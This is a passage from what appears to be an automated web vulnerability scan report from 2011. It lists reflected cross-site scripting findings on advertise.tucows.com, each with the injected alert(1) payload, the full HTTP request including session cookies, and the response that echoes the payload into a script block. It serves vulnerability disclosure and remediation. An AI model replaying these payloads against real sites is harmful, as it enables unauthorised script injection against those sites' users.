<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.8. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8543"-alert(1)-"e7c1cf5b326 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.9. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471ee"-alert(1)-"f64e6d809a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.10. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d10"-alert(1)-"e562c2cd8f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.11. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f2c"-alert(1)-"78bef03947c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js33f2c"-alert(1)-"78bef03947c/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js33f2c"-alert(1)-"78bef03947c/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.12. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f00"-alert(1)-"b89799debf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js22f00"-alert(1)-"b89799debf7 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/aalib.js22f00"-alert(1)-"b89799debf7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.13. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd4"-alert(1)-"6bee40325ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.14. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78547"-alert(1)-"ce4057ee76f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.15. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a92"-alert(1)-"496766b8176 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.16. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4586a"-alert(1)-"2bd19196b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.17. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac19"-alert(1)-"1250877226f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

